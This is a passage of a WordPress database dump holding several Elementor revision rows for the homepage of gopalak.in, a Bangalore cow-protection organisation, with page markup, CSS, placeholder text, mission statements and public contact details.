leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:51:37','2022-10-10 12:21:37','',1373,'https://gopalak.in/?p=1591',0,'revision','',0),(1592,1,'2022-10-10 17:52:17','2022-10-10 12:22:17','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:52:17','2022-10-10 12:22:17','',1373,'https://gopalak.in/?p=1592',0,'revision','',0),(1593,1,'2022-10-10 17:52:17','2022-10-10 12:22:17','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:52:17','2022-10-10 12:22:17','',1373,'https://gopalak.in/?p=1593',0,'revision','',0),(1594,1,'2022-10-10 17:52:17','2022-10-10 12:22:17','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:52:17','2022-10-10 12:22:17','',1373,'https://gopalak.in/?p=1594',0,'revision','',0),(1595,1,'2022-10-10 18:12:20','2022-10-10 12:42:20','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading 